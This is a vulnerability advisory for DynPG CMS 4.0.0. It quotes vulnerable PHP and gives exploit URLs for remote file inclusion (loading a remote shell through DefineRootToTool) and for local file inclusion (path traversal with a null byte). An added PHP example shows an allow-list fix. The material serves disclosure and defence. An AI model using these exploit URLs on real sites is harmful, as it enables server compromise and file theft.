
14.12.2009, 20:11
DynPG CMS 4.0.0
Web site : http://www.dynpg.org
Version : 4.0.0
[Remote File Inclusion]
Vuln file: counter.php [line 15]
PHP code:
$inc = empty($_GET["inc"]) ? 0 : $_GET["inc"];
if ( !empty($inc) ) {
    # Counter called via a link. $inc then contains the database identifier!
    $inc_or = htmlentities(urldecode($inc));
    $inc_head = urldecode(str_replace('&amp;', '&', $inc));
    $inc = addslashes(strtolower($inc));
    if ( empty($GLOBALS["DefineRootToTool"]) ) {
        $GLOBALS["DefineRootToTool"] = "";
    }
    require_once $GLOBALS["DefineRootToTool"]."config.php";
Exploit:
if register_globals = ON && allow_url_include = ON
Code:
http://[host]/[path]/counter.php?inc=1&DefineRootToTool=[shell]?
[Local File Inclusion]
Vuln file: languages.inc.php [line 5]
PHP code:
global $lang_dpg;
require_once dirname(__FILE__) . '/plugins/languages.php';
require_once dirname(__FILE__) . '/localised/dynpg_backend/'.strtolower($_SESSION["LANGUAGE"]).'.lang.php';
Exploit:
if register_globals = ON && magic_quotes = OFF
Code:
http://[host]/[path]/languages.inc.php?_SESSION[LANGUAGE]=../../../../../../../../[local_file]%00
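
Added example, not part of the original post and not DynPG's own code: one way to write the languages.inc.php include so the language value cannot steer the path, with the matching counter.php change noted in a comment. The function name language_file, the language-code pattern and the 'en' default are assumptions for illustration.

```php
<?php
// Added example (not DynPG code). Names, pattern and default are assumptions.
//
// counter.php: take the include root from the file's own location, not from
// $GLOBALS["DefineRootToTool"], which register_globals lets a request set:
//     require_once __DIR__ . '/config.php';

// languages.inc.php: accept only a short language code, then confirm the
// resolved file really sits inside the language directory before including it.
function language_file(string $langDir, $requested, string $default = 'en'): string
{
    // Arrays (e.g. ?_SESSION[LANGUAGE][]=x) and other non-strings fall back to the default.
    $code = is_string($requested) ? strtolower($requested) : '';

    // Allow-list: "en" or "en_gb". Anything with ../, NUL bytes or a URL scheme fails.
    if (!preg_match('/\A[a-z]{2}(?:_[a-z]{2})?\z/', $code)) {
        $code = $default;
    }

    $root = realpath($langDir);
    $file = ($root === false)
        ? false
        : realpath($root . DIRECTORY_SEPARATOR . $code . '.lang.php');

    // Defence in depth: the canonical path must exist and stay under $root.
    if ($file === false || strpos($file, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('language file not available');
    }
    return $file;
}

// Constructed demo: a temporary directory stands in for localised/dynpg_backend/.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lang_demo_' . getmypid();
@mkdir($dir);
foreach (['en', 'de'] as $l) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $l . '.lang.php', "<?php\n");
}

// Constructed inputs: two valid codes, a traversal with a NUL byte, an array, a URL.
$inputs = ['de', 'DE', "../../../../etc/passwd\0", ['x'], 'http://example.invalid/x'];
foreach ($inputs as $input) {
    echo json_encode($input), ' -> ', basename(language_file($dir, $input)), "\n";
}

// Remove the demo files again.
array_map('unlink', glob($dir . DIRECTORY_SEPARATOR . '*.lang.php'));
rmdir($dir);
```

Both conditions listed in the post depend on register_globals, which was removed in PHP 5.4; the allow-list keeps the include safe even where request data reaches the session or global scope by some other route.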